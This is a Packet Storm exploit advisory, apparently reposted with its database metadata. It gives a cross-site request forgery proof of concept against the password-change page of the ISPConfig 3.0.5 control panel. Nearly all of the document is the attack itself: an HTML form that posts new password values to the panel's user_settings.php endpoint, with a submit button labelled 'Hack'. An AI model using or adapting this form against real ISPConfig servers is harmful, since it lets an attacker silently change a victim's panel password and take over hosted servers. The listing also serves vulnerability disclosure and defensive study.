ISPConfig 3.0.5 Cross Site Request Forgery

2016-08-01T00:00:00
ID PACKETSTORM:138127
Type packetstorm
Reporter bl4ck_MohajeM
Modified 2016-08-01T00:00:00

Description

                                        
                                            `<!--  
# Exploit Title: ISPConfig 3.0.5 (Change Password) CSRF Exploit  
# Date: 11/07/2016  
# Exploit Author: bl4ck_mohajem  
# Vendor Homepage: http://www.ispconfig.org  
# Version: 3.0.5  
# Tested on: Ubuntu  
  
# Introduction:  
ISPconfig is an open source multilingual control panel which enables  
you to manage multiple servers under one control panel.  
  
#PoC :  
-->  
<form action="http://demo3.ispconfig.org/tools/user_settings.php" method="post">  
<input name="passwort" value="" type="password">  
<input name="repeat_password" value="" type="password">  
<input type="hidden" name="language" value="en">  
<input type="submit" value="Hack">  
</form>  
<!--  
  
######################################################  
#  
#tanks: Dr Ms Jk - n1arash - Milad Hacking - malah_sky  
############################################################  
`